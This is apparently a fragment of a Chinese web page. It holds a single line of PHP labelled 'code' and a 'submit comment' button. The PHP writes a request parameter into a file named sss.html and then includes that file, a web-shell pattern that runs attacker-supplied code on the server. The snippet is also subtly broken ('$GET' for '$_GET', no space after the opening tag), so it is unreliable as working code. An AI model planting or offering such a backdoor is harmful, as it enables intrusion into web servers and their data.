代码:
<?php$myfile = fopen('sss.html',"w");$txt = $GET['b'];$a[1]=$txt;fwrite($myfile,$a[1]);fclose($myfile);include "sss.html";?>
提交评论